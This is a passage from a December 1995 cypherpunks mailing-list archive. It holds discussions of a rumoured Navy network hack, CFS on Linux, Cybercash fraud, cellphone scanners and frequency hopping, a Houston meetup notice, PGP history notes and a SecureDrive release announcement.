press is the vital role in preserving liberty played by robust discussion of
public issues among a diversity of viewpoints.

Unfortunately, the bill undoes much of the existing protection ensuring
diversity in points of view by allowing a greater concentration of media.
 The conference report would, for example, allow the FCC to use waivers so
that a single corporation could own the television station, radio station,
cable system, newspaper, phone company and Internet access provider in a
locality.  On the national level, the bill will allow a greater concentration
of control over programming sources.

No clearer example exists of the destructive impact on free speech such media
concentration will have than CNN's recent rejection of advertisements
opposing the telecommunications bill itself.  CNN's corporate owners, of
course, have vital interests generally being advanced by the bill, but the
decision to reject opposing ads (followed up by a decision to reject all ads
on the bill -- when the issue was generally developing in favor of CNN's
owners) is the kind of content control that will only be repeated as media
concentration increases. 

Conclusion

The American Civil Liberties Union urges you to oppose the conference version
of S. 652 (H.R. 1555), the telecommunications deregulation bill because it
will impose new speech crimes on cyberspace and  new censorship on television
programming, as well as jeopardize the future of free speech in this country
by destroying the diversity of media ownership.

Sincerely yours,

Laura W. Murphy
Director


Donald Haines
Legislative Counsel

----------------------------------------------------------------
ONLINE RESOURCES FROM THE ACLU NATIONAL OFFICE
----------------------------------------------------------------
Stay tuned for news on the ACLU's world wide web site, under construction at
http://www.aclu.org/.  America Online users should check out our live chats,
auditorium events, *very* active message boards, and complete news on civil
liberties, at keyword ACLU.

----------------------------------------------------------------
ACLU Cyber-Liberties Update
Editor: Ann Beeson (beeson@aclu.org)
American Civil Liberties Union National Office
132 West 43rd Street
New York, New York 10036

To subscribe to the ACLU Cyber-Liberties Update, send a message to
cyber-liberties@aclu.org with "subscribe Cyber-Liberties Update" in the
subject line of your message.  To terminate your subscription, send a message
to cyber-liberties@aclu.org with "unsubscribe" in the subject line.

For general information about the ACLU, write to info@aclu.org.
----------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vin@shore.net (Vin McLellan)
Date: Sat, 23 Dec 1995 06:26:24 +0800
To: cypherpunks@toad.com
Subject: Re: Navy hacked by Air Force?
Message-ID: <v02130506ad00d56c1943@[198.115.178.219]>
MIME-Version: 1.0
Content-Type: text/plain


        This might be relevant. This is a page from the NCCOSC web site
<http://www.nosc.mil>

        The Naval Command, Control  & Ocean Surveillance Center (NCCOSC) is
the U.S. Navy's warfare center for command, control and communication
systems and ocean surveillance and the integration of those systems which
overarch multiplatforms. NCCOSC is based in San Diego, CA.

        NCCOSC Command Internet (NCI) is part of NCCOSC, of course -- and
NCCOsc is part of SpaWar (Space and Naval Warfare Systems Command.)  Clear?

        Note that NCCOSC recently decided to beef up NCI's user
authentication.  See "Current Initiatives."

=================
[* ] NCI net - What it is

   * An enterprise network serving NCCOSC and other communities of interest
   * Modelled after the global Internet, logically part of the Internet
   * Communications nodes at each NCCOSC site, linked by T-1 lines
   * Nodes consist of...
        o Cisco router linking T-1 lines and local LANs
        o  Annex terminal server and modem bank for dialup, SLIP, and PPP
          access
        o Sun servers providing general Internet services (email, name
          service, ftp server, world wide web, multicast routing, etc.)
        o NeXT server supporting corporate office functions
   * Provides ubiquitous high-speed low-delay TCP/IP connectivity throughout
     the organization and to the Internet
   * Provides dialup access from home or TDY via 1-800 number, including
     SLIP and PPP support

[* ] [ ]  Network Topology

[* ] Recent activities and milestones

   * MIME adopted as corporate email standard, email systems upgraded
        o Many user agents upgraded to MIME compliance
        o Testing gateways for interoperability with non-compliant systems
        o Performing extensive interoperability tests
   * New sites connected
        o CINCLANTFLT, Norfolk, VA
        o The Pentagon
             + BRAC Office
             + OSS LAN
             + DASN/C3I
        o FTSCLANT (Portsmouth, VA) and NAVSEACENPAC (San Diego, CA)
        o Armed Forces Staff College, Norfolk, VA
        o USACOM site in Suffolk, VA
             + Joint Training, Analysis, and Simulation Center (JTASC)
             + NISE East Contingent at USACOM
        o NISE West Guam
        o NISE West Yokosuka Japan
   * Network accredited
        o Completed Security Test and Evaluation
        o Completed Risk Assessment
        o Published Contingency Plan and Configuration Management Plan
   * Network now under full configuration management
   * New Web server installed
        o "neelix", a Sun SparcServer 1000, installed outside firewall
        o "www.nosc.mil" now points at neelix
        o "Planet Earth" now served by neelix
        o Recent updates
             + 1 additional Sparc processor (completed 6/9/95)
             + 4 Gb more disk (completed 6/2/95)
             + another 64 Mbytes of memory (giving total of 96 Mbytes)
               (completed 6/2/95)
             + conversion to "Apache" http server (faster) (completed
               6/1/95)

[* ] Current Initiatives

   * Enhancing Infrastructure to provide ISDN dialup service
   * Implementing one-time-passwords using SecurID cards
   * Implementing Kerberos based authentication for additional security
   * Connecting additional sites
        o NISMC
        o USACOM at CINCLANT compound, Norfolk, VA
        o Pearl Harbor Naval Shipyard, Pearl Harbor, HI
        o Federal Internet Exchange (FIX) East, College Park, MD
        o New NISE East Detachment at Naval Weapons Station, Yorktown, VA
        o ONI at NMIC
   * Upgrading D.C. area connectivity to Metropolitan Fiber service at 10
     Mbps
   * Getting sites 100% connected (TCP/IP to every desktop)
   * Developing MIME to X.400 gateway for connectivity to DMS world

[* ] References

   * Dialup Quick Guide
   * Monthly Reports
   * June 28 Internet Security Briefing (postscript)

    Vin McLellan +The Privacy Guild+ <vin@shore.net>
 53 Nichols St., Chelsea, Ma. 02150 USA Tel: (617) 884-5548
                <*><*><*><*><*><*><*><*><*>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sat, 23 Dec 1995 06:21:47 +0800
To: Alex de Joode <usura@berserk.com>
Subject: Re: CFS and Linux
In-Reply-To: <199512222107.WAA00408@asylum.berserk.com>
Message-ID: <199512222143.QAA14493@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


>two comments for matt thoo:
>  1: please make it install 'out-of-the-box' on Linux.
> 

I'd love to.  It isn't that simple.  No one has ever told me exactly what
"the Linux problem" is or even convinced me that a problem actually exists.

I don't run Linux.  People who do run Linux are divided between telling
me it that does run out-of-the-box and that it doesn't.  ALL I can do is
pass on patches that the people who run CFS under Linux give me.  My
understanding is that CFS does run out-of-the-box under some of the
all-too-many varieties of Linux, but that it depends very much on your
particular configuration (particularly your rpcgen version).  Some
configurations require some tweeking.  If you want to see CFS supported
out-of-the-box on a particular platform, someone has to tell me about it
and supply me with the fixes, which I will galdly wrap into the distribution.
Requests that I make something work on a platform that I don't have and
don't control are very frustrating.

Anyway, this is the wrong list for this.  Linux issues come up every now and
then on the cfs-users mailing list (cfs-users-request@research.att.com;
subscription info included in the distribution).

-matt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vin@shore.net (Vin McLellan)
Date: Sat, 23 Dec 1995 07:12:31 +0800
To: cypherpunks@toad.com
Subject: Re: Navy hacked by Air Force?
Message-ID: <v0213050aad00da5e42cf@[198.115.178.219]>
MIME-Version: 1.0
Content-Type: text/plain


        Drescher/Cohen/Drescher/Drescher/Cohen/Cohen....

        I'm new to C'punks, so I don't yet have a grip on the context in
which you consider privacy, property, and other ultimate values.  I do
wonder, though: Do you spend a lot of time pissin' on each other's shoes
like this?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an170150@anon.penet.fi
Date: Sat, 23 Dec 1995 04:02:03 +0800
To: cypherpunks@toad.com
Subject: No subject
Message-ID: <9512221713.AA19435@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



Hi, excuse me for interrupting your conversation with a different subject,
but I am not on the list (any longer, due to the bandwidth) so please
reply "directly" to me at an170150@anon.penet.fi    ...my question is:

Are there any other anon servers running the same software as the
one @alpha.c2.org?


--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: turner@TeleCheck.com
Date: Sat, 23 Dec 1995 08:23:01 +0800
To: cypherpunks@toad.com
Subject: Houston C'punk gathering
Message-ID: <9512222346.AA01818@mercury.telecheck.com>
MIME-Version: 1.0
Content-Type: text/plain



For C'punks in the Houston area, there will be an informal gathering 
at Strack's Restaurant, tomorrow at approx. 11:00 a.m.

I will attempt to get there a little early, and I will be the one with a red 
lamborghini countach on the table.  Just come up and sit down.  
Strack's has a breakfast buffet which is reasonably priced, or at 
least it was the last time I went there.

Possible Topics for Discussion:

I will also be bringing the encryption algorithms used by VMS (the 
AUTODIN-II, Purdy with salted input, Purdy (Purdy V) with variable 
length username, and the Purdy (Purdy S) with additional bit 
rotation).  I have tested these under VMS 6.2 and they seem to 
work fine, although they could be (and should be) optimized for 
brute forcing.

I will also be bringing some password brute forcing code that 
utilize the system services to encrypt the password (and punch CPU 
usage through the roof).  It will crack a three character password 
in under a minute on a loaded AXP 3000LX.  

I will also be bringing a copy of the infamous _Giant Black Book of 
Computer Viruses_ by Mark Ludwig.  Interesting stuff.  

Directions (from Houston):

 	Take I-45 North.  You will pass 1960 and then will drive 
though a stretch of road riddled with construction barrels.  Do not 
exit Holzworth, but take the next exit (Louetta).  Get on Louetta 
(you will have to make a right turn and you will be on the overpass), 
and take the overpass west towards Tomball.

	You will cross through several intersections, Strack's 
will be on your left, after you cross Kukendaul (approx. 1-2 miles 
ahead).

	If anyone gets lost, or wants more info you can page me
at: (713) 866-0989.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 23 Dec 1995 08:42:50 +0800
To: cypherpunks@toad.com
Subject: Re: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE??
In-Reply-To: <199512222111.NAA24171@jobe.shell.portal.com>
Message-ID: <199512222355.SAA04987@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



anonymous-remailer@shell.portal.com writes:
> Everyone should ask this question.  AT&T can sign-on to a two-page ad,
> calling on Congress to balance the budget -- to cut off veterans, and
> cut-off women with dependent children just before Christmas.  It can
> sign on to this, but it can't bother to even offer a scholarship to
> the students who helped make its fortunes.  It would rather leave the
> impression that it freeloads off of other's efforts.
> 
> It's shameful.

God, you are annoying Fred, ER, I meant, "Alice".

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Sat, 23 Dec 1995 08:50:20 +0800
To: cypherpunks@toad.com
Subject: IW Mailing List iw/951222 (fwd)
Message-ID: <9512230004.AA27098@all.net>
MIME-Version: 1.0
Content-Type: text


The following is forwarded from Risks [...s indicate missing regions of text]

> ---------------------------------------------
>    FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
>    ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator
> ...
> Date: Fri, 22 Dec 1995 00:59:09 -0500
> From: RSRMadison@aol.com
> Subject: Re: Naval Battleship takeover (Long, RISKS-17.55)
> 
> A message from the InfoWar list noted that: <<There are NO active US
> battleships!!! And there weren't any last September.>>
> 
> As stated, this is true. However, let the record show that the US Navy still
> flies the flag daily over 1 commissioned battleship, the USS Arizona,
> permanently stationed in Honolulu.
> 
> ...
> Date: Fri, 22 Dec 1995 10:53:56 -0500
> From: Bob Brewin <brewin@access.digex.net>
> Subject: Re: Naval Battleship takeover (Long, RISKS-17.55)
> 
> Yikes.  This story will not die -- it just lives on a Web site at the
> Daily Telegraph in London.  Having worked for a British news
> organization (Reuters) for years, if you believe the Telly story, call
> me about a bridge I have for sale. 
> 
> The Air Force did not hack the Navy over the Internet.  They did it over
> a secure network (SIPRNET) which is firewalled from the Internet. 
> 
> The Air Force conducted this attack with the Navy's knowledge and
> permission. 
> 
> The Navy does not have any battleships on active duty.
> 
> The Air Force did not get control of the none-existent battleship.
> 
> Yep. This does have the makings of a legend.
> 
> Bob Brewin editor-at-large (whatever that means) federal computer week
> antenna@fcw.com brewin@access.digex.net
> ...

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 23 Dec 1995 09:11:48 +0800
To: vin@shore.net (Vin McLellan)
Subject: Re: Navy hacked by Air Force?
In-Reply-To: <v0213050aad00da5e42cf@[198.115.178.219]>
Message-ID: <199512230006.TAA05018@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Vin McLellan writes:
>         Drescher/Cohen/Drescher/Drescher/Cohen/Cohen....
> 
>         I'm new to C'punks, so I don't yet have a grip on the context in
> which you consider privacy, property, and other ultimate values.  I do
> wonder, though: Do you spend a lot of time pissin' on each other's shoes
> like this?

"Dr." Fred Cohen is a bit of a local pariah. We don't like him much,
and we all pretty much agree that he's an obnoxious weenie (except the
mysterious anonymous "Alice de Nonymous").

I don't know Drescher.

This stuff isn't what this mailing list is for...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 23 Dec 1995 11:39:44 +0800
To: cypherpunks@toad.com
Subject: Re: CFS and Linux
Message-ID: <199512230317.TAA19444@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


>  1: please make it install 'out-of-the-box' on Linux.

AT&T's refusal to support CFS and other so-called "secure" software
under Linux is typical and to be expected.  Linux, the most popular
alternative to Microsoft, represents a direct threat to AT&T's bread
and butter and to their ability to control the security software market.
The fact that the CFS install programme deletes other security software
is no accident.  We would be foolish to expect them to admit their
malice - they will excuse it as a "mistake" or will ignore it altogether.

I don't agree with all of the "Gates" character's claims against
AT&T, however I think their motives can be summed up in three words:
Greed, Greed, Greed.  Use their software and you support the giant.
Remember their theft from the Berkeley graduate students each
time you accept "free" software from this greedy monster.

I also do not accept Blaze's cowardly defense of his actions and of
his too-comfortable situation; one cannot help but be reminded of
the Nazi "just following orders" prattle repeated rote as they were
called to answer for their crimes.  It rings no less hollow to this
day.  But I will not condemn him, nor will I call on others to do so,
preferring to leave that matter between him and his Maker.

Weinstein, of course, is beast of another color, but that will have
to wait.

Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Sat, 23 Dec 1995 12:25:08 +0800
To: perry@piermont.com
Subject: Re: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE??
In-Reply-To: <199512222355.SAA04987@jekyll.piermont.com>
Message-ID: <9512230029.AA27699@all.net>
MIME-Version: 1.0
Content-Type: text


> anonymous-remailer@shell.portal.com writes:
> > Everyone should ask this question.  AT&T can sign-on to a two-page ad,
> > calling on Congress to balance the budget -- to cut off veterans, and
> > cut-off women with dependent children just before Christmas.  It can
> > sign on to this, but it can't bother to even offer a scholarship to
> > the students who helped make its fortunes.  It would rather leave the
> > impression that it freeloads off of other's efforts.
> > 
> > It's shameful.
> 
> God, you are annoying Fred, ER, I meant, "Alice".

I hope you don't think I'm Alice - and I don't think Alice's first name
is Fred.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@berserk.com>
Date: Sat, 23 Dec 1995 06:55:57 +0800
To: mab@crypto.com (Matt Blaze)
Subject: Re: CFS and Linux
In-Reply-To: <199512210440.XAA28196@crypto.com>
Message-ID: <199512222107.WAA00408@asylum.berserk.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> > 
> > Is there anyone out there that has CFS running with Linux ?
> > 
> > It installs fine on BSDi 2.0 but I'm unable to install it 
> > under Linux, I would appreciate it if some one would help
> > me out.
> > 
> >  -AJ-
> 
> I don't run Linux, and every time I open my mouth it seems to provoke
> a flame-fest, but I'll risk responding anyway.
> 
> I'm told that all version of CFS since 1.0.4 (the latest is 1.3.1)
> do work out-of-the-box under *some* releases of Linux and with some
> coaxing on the others.
> 
> I'm not sure exactly what problem you're having, but the most common
> CFS-Linux problem that people complain about has to do with the rpcgen
> output not being in the format expected by the rest of CFS.  There
> seem to be two things you can do about this:  get a version of rpcgen
> that generates the "standard" (original Sun) names for the functions it
> generates, or just grab the rpcgen output from the cfs-users mailing list
> archive ("echo help | mail cfs-users-request@research att.com" for details).
> 

I would like to thank all people who gave me pointers; with the
help of my sysadmin at Utopia we were able to compile and install it.

two comments for matt thoo:

 1: please make it install 'out-of-the-box' on Linux.

 2: please rename the ssh shell programm, 
    it did overwrite my ssh/slogin programm.

All things said; thanks for really wonderfull programm.

 -AJ-

ps: Merry Xmas and a Happy NewYear 2all !





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 23 Dec 1995 21:52:56 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: (fwd) Java implementation of secure login protocol
Message-ID: <199512230408.XAA27975@homeport.org>
MIME-Version: 1.0
Content-Type: text


Look, Ma!  Java code!

Real cyph3rpunks, of course, flame each other anonymously.

(Incidentally, I got tired of Alice making it to my noise box, and the
following seems to work well.  Deleting the leading ^ characters would
cause all responses to go into the junk box; perhaps a good idea.
This is, for those of you who don't recognize it, procmail code.  My
mail filter of choice for hacking in.)

   :0B:
   * ^Alice de 'nonymous
   * ^P.S.  This post is in the public domain.
   | formail -a "Status: O" >> cjunk



> From: greg@qualcomm.com (Greg Noel)
> Newsgroups: comp.lang.java,sci.crypt
> Subject: Java implementation of secure login protocol
> Date: 19 Dec 1995 23:12:52 -0800
> Organization: QUALCOMM, Incorporated; San Diego, CA, USA
> Lines: 64
> Message-ID: <4b8d1k$6o9@qualcomm.com>
> NNTP-Posting-Host: guru.qualcomm.com
> 
> Please note that this article is cross-posted both to comp.lang.java and
> sci.crypt.  If you follow up, please trim the newsgroups appropriately.
> 
> Since a number of people expressed interest, I'm releasing an initial
> implementation of a secure login protocol in Java.  This is still very
> much a work in progress (it's not really even of alpha quality), but
> the protocol itself is functional.
> 
> It's intended that the classes in crypto.* and qualcomm.qbs.login.*
> live on the client; any other classes needed would be downloaded over
> the encrypted link.  Hopefully, the client-resident classes will be
> few in number and change rarely; they are just intended to bootstrap
> up the connection.  In the long run, the classes in crypto.* could be
> provided by the vendor of the Java VM.
> 
> The distribution consists of two files:
> 	ftp://ftp.qualcomm.com/pub/gnoel/java.login.tar.gz
> 	ftp://ftp.qualcomm.com/pub/gnoel/java.no-export.tar.gz
> The first file contains the logic to execute the protocol and launch
> the splash screen (see below); it also contains the base classes from
> crypto.* but no cryptographic functions.  The second file contains the
> base classes and the actual implementations of a few cryptographic
> functions to demonstrate how the base classes can be used.
> 
> For sci.crypt, I've tried to capture the essence of what cryptographic
> functions can do in the base classes, without being specific to any
> particular protocol.  I'm not completely happy with it, and would welcome
> any comments people might have on what might be missing.  It's as minimal
> as I could make it and still provide a basis for whatever protocols need
> to be implemented.
> 
> My motivation here is that Sun and Netscape are talking about defining
> a standard way of incorporating cryptographic functions in Java; it would
> be nice if the specification were usable for a lot more than the security
> protocols that come with Netscape.  (I wouldn't object to having access
> to SSL from Java---in fact, I'd really like it---but I'd also like access
> to MD5 and the like.)
> 
> This implementation of the secure login protocol uses short text strings
> to identify the packets being exchanged; that's for convenience while
> debugging---in a production implementation, it would be done differently.
> Other than that, I'd appreciate any suggestions as to how to improve the
> implementation.  (A MAC digest prefixed to the packets is something I'm
> considering, for example.)
> 
> For comp.lang.java, the splash screen is loaded over the secure connection
> but attempts to instantiate a member of the class cause a NoSuchMethodError
> to be thrown.  The class itself seems to be defined correctly, and it should
> be no different from how an applet would be loaded and instantiated, but it
> still fails.  If anyone can tell me what is going wrong and what I can to
> to fix it, the pizza and beer will be on me.  (This has been a showstopper
> for four days now and I'm getting very frustrated by it.)
> 
> The class design tries to minimize the number of classes that must be
> present in the bootstrap set; this led to a somewhat, ah, baroque set of
> functionality.  If anyone has suggestions on how this could be done better,
> I'd be pleased to hear about it.
> 
> If anyone has any questions about this, don't hesitate to drop me a line
> or post something in one of the newsgroups.  I'm going home for some sleep
> now, but I'll be banging my head against it again in the morning.
> 
> -- 
> -- Greg Noel, UNIX Guru         greg@qualcomm.com  or  greg@noel.cts.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Sat, 23 Dec 1995 21:49:46 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Encrypted script - sort of
In-Reply-To: <m0tTFol-00090DC@pacifier.com>
Message-ID: <Pine.LNX.3.91.951222230842.16815A-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


> >A tale I hear is that when HP had to deliver operating system source to
> >the french government they stripped all comments and changed all variable
> >and subroutine names to 32 byte strings of I 1 0 (zero) and O (uppercase O).
> >It still compiled but was 100% useless to human readers.

A somewhat useful utility would be one that would compress C code into as 
small space as possible, stripping out all spaces and making variable 
names one character a piece when possible. And of course one to expand it 
back into 'formatted' text, style could even be incorporated.

I'm sure a Perl fanatic knows a quick solution... I'm always amazed at 
how short Perl code is.. :)   Anyone care to take care of this utility?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: floyddb@alpha.c2.org
Date: Sat, 23 Dec 1995 19:55:55 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199512231130.DAA26556@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Dec 1995 andr0id@midwest.net (Jason Rentz) wrote:

>>        
>>
>
>The problem with the Interceptor is that I think it can only receive one
>freqency at a time, and it is adjustable by a thumb wheel, not digitally.
>This would tend to make changing frequencies at high rates VERY hard. :)
>Also it has no frequancy readout, so this means that if you know what freq.
>you should be at it is hard to tune in that freq. without searching a little.  
>                        Dr0id
>
>
>( Computer Consulting & Management   )
>(P.O. Box 421  Cambria, IL 62915-0421)
>

The demo of the Interceptor I saw seemed to show it jumping from 150 MHz to 450 
MHz without any external adjustments, it locked on the strongest signal.
Granted, it can only receive one frequency at a time, but there shouldn't be any
significant delays when the phone hops a frequency.  The Interceptor's 
frequency readout is a bargraph style LED.  The Scout, from what I can
see in Optoelectronics' ad doesn't have any frequency controls on it, it does
have a digital frequency readout.  As far as timing is concerned, the Scout 
might be less useful because I think it feeds the frequency into the scanner for
reception.  Most scanners take a significant amount of time to change
frequencies.

Merry Christmas

        Floyd D. Barber
        floyddb@alpha.c2.org
        Key fingerprint:
        8A 98 1F 6B 70 7A FE 24 
        35 D4 48 CF 9D F6 B0 91





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sat, 23 Dec 1995 17:57:15 +0800
To: "David Klur" <dklur@dttus.com>
Subject: Re: Cybercash questions...
Message-ID: <v02130503ad013a9c6992@[165.254.158.212]>
MIME-Version: 1.0
Content-Type: text/plain


At 13:39 12/22/95, David Klur wrote:

>     The fraud possibility I see is that Bob could steal Alice's encrypted
>     credit card number (by sniffing when she buys something at Charlie's
>     Internet shop).  Then, without decrypting it, he could use it (still
>     encrypted) at Don's Internet shop, and ask Don to ship the goods to
>     Bob's address.  Since Don will not decrypt Alice's card number he will
>     not know that it is not Bob's card.  Cybercash will validate Alice's
>     card, but will not know that it is really Bob who is the customer.
>     Don will ship the goods to Bob, and Alice will get a fraudulent charge
>     on her bill.
>
>     Am I missing something?

If when Alice sends her encrypted card number to Charlie, it were encrypted
with Charlie's Public Key, then the version that Bob gets is useless if
sent to Don (since it will not decrypt with Don's Secret Key into something
that when sent to Cybercash will yield Ann's CC# when decrypted with
Cybercash's Secret Key). This still leaves the data as valid for use at
Charlie unless the actual decrypt by Charlie contains more than just the
CC#, so as to flag an "replay" attempt (ie: if the sending of the CC# is in
realtime, there could be a check field in there to validate the response as
being for the current request) and reject it.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Rose <Greg_Rose@sydney.sterling.com>
Date: Sat, 23 Dec 1995 06:37:35 +0800
To: aba@atlas.ex.ac.uk
Subject: Re: PGP timeline FAQ... comments requested
In-Reply-To: <297.9512221337@exe.dcs.exeter.ac.uk>
Message-ID: <pgpmoose.199512230812.34599@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain


I've embedded a couple of comments that might be
useful.


  1.4  Amusingly Adi Shamir (A from RSA) isn't even a US citizen, he's an

Shamir is the 'S' from RSA, not the 'A'.

  1.6  Because the publication was a rush job due to the NSA, R,S & A
       and the later formed PKP and RSADSI lose patent rights
       to RSA crypto outside the US.  This is because most places
       outside the US, you have to obtain a patent *before*
       publication, where as in the US, you have one year from the
       publication date to file for patents.  This also had implications for
       PGP later

This is only half true. US Patent law was
developed independently of most of the rest of
the world's, and allowed patents like this. The
Australian patent office would, at the time, have
rejected the patent anyway on the grounds that
you can't patent a mathematical formula.

  ======================================================================
  3    USG decides they don't like PRZ
  ======================================================================

You haven't defined USG as an acronym yet. To me
it means Unix Support Group. It does come clear
later though.

regards,
Greg.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Sun, 24 Dec 1995 01:03:31 +0800
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <v01530512ad01d78bc507@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


>On Fri, 22 Dec 1995 andr0id@midwest.net (Jason Rentz) wrote:
>>
>>The problem with the Interceptor is that I think it can only receive one
>>freqency at a time, and it is adjustable by a thumb wheel, not digitally.
>>This would tend to make changing frequencies at high rates VERY hard. :)
>>Also it has no frequancy readout, so this means that if you know what freq.
>>you should be at it is hard to tune in that freq. without searching a
>>little.
>>                        Dr0id
>
>The demo of the Interceptor I saw seemed to show it jumping from 150 MHz
>to 450
>MHz without any external adjustments, it locked on the strongest signal.
>Granted, it can only receive one frequency at a time, but there shouldn't
>be any
>significant delays when the phone hops a frequency.  The Interceptor's
>frequency readout is a bargraph style LED.  The Scout, from what I can
>see in Optoelectronics' ad doesn't have any frequency controls on it, it does
>have a digital frequency readout.  As far as timing is concerned, the Scout
>might be less useful because I think it feeds the frequency into the
>scanner for
>reception.  Most scanners take a significant amount of time to change
>frequencies.

I used to work for a company that made frequency-hopping military radios.
It's a catch-me-if-you-can game, a bit like the amusement arcade toy where
stuffed rats pop up through holes and you try to whack them with rubber
hammers. You can sure *see* where the next one is, but you can't get there
fast enough to make contact. If you knew the pseudo-random pattern, you
could anticipate and be there every time.

Thus in a frequency-hopping radio you can push the retuning (read RF
phase-locked loop) technology to its limit and build transmitters and
receivers around them. These typically hop in the order of 100 times a
second. The adversary has to find the uncorrelated signal very quickly
indeed *and* have PLL technology at least as good as yours to recover
anything from it. Finding the signal generally means listening to all
frequencies at once, requiring huge amounts of hardware parallelism and/or
realtime computing power. Once you throw ten or so radios onto the same
band, it's no longer any use looking for the strongest signal, making that
approach useless.

The primary reason for FH is not to hide information, however. Encryption
can be used for that. It's to prevent the enemy from hiding the information
from the intended recipient through jamming. Radio jammers work by simply
drowning out all other traffic so that the receivers either clip and
distort everything or have to attentuate the input signal so far that the
interesting stuff is undetectable. Like trying to have an intellectual
conversation at a bad rock concert. By employing FH you require the enemy
to have enormous and impractical jamming capacity. There are FH radars too.



-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
                                   |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sat, 23 Dec 1995 17:16:24 +0800
To: Dan Harmon <harmon@tenet.edu>
Subject: Re: Cypherpunks resumes?
In-Reply-To: <acfef043040210048277@[205.199.118.202]>
Message-ID: <Pine.BSD.3.91.951223072333.16731B-100000@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



Dan Harmon wrote: 

> and pose the question 
> 'who the fuck are you.?'

    good choice of expletives.... 

    'who the fuck are you.?'  --nobody, I guess. 

	I have a Piled higher and Deeper in information techniques
    from Zuerich (undergrad at Harvard in physical chemistry --boring);
    I've been around since before the dawn of arpa net, probably as long 
    as TCMay --but I've never held a "job"; 
	I've personally coded two 250,000+ line packages which made me
    more than comfortable, even if one did go down the black hole (and
    countless other things like the bit-slice firmware to replace the
    B3500s in missle silos); 
	I have been charged with crypto offenses by the Feds; and, I have
    been charged with "treasonable" technology export by the Feds; and, a
    long time aog did more than one tour in USMC special operations in SE 
    Asia --as a BNCO and chopper pilot. 
	Oh, yeah, I forgot, I hold a license to practice before the court
    in a couple European countries. 

    read the following while playing 'Hotel California'

	So, who the fuck am I?  --just another aging 300 lb gorilla, 
    long haired hippie California freak with an outlaw chopper. 

	So, who am I?  Nobody, I guess  -just attila.










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Edgar Swank <edgar@Garg.Campbell.CA.US>
Date: Sun, 24 Dec 1995 02:34:05 +0800
To: Cypherpunks          <cypherpunks@toad.com>
Subject: Announcing SecureDrive 1.4a
Message-ID: <quPkgD4w165w@Garg.Campbell.CA.US>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This is to announce the availability of Version 1.4a of SecureDrive.

SecureDrive Version 1.4a replaces version 1.4, 1.3d, and previous
versions.

Release 1.4a is a maintenance release of 1.4. No new function is added.

Only module SDCOMMON.C has a non-cosmetic change, which affects
executables LOGIN.EXE and CRYPTDSK.EXE. For that reason, all other
executables still self-identify as release 1.4. They are in fact the
exact same EXE & COM files as release 1.4.

